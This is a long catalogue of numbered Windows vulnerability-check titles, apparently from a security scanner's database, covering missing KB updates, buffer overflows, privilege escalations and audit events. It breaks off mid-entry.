[54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed [48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45537] Microsoft Message Queuing RPC code execution [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44704] Microsoft Host Integration Server SNA RPC code execution [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not 